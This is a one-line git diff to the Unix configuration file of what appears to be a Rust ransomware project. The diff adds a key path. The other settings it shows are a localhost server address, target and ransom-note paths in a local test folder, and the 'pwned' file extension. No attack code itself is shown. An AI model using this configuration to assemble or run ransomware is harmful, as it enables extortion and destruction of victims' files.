--- a/infect/config_unix.toml
+++ b/infect/config_unix.toml
@@ -3,6 +3,7 @@ server_address = "127.0.0.1:6969"
 log_path = "files/ransom_log.txt"
 target_path = "/Users/wolf/dev/rust_projects/ransom_testing"
 note_path = "/Users/wolf/dev/rust_projects/ransom_testing"
+key_path = "/Users/wolf/dev/rust_projects/ransom_testing"
 extension = "pwned"
 retries = 3
 timeout_seconds = 10
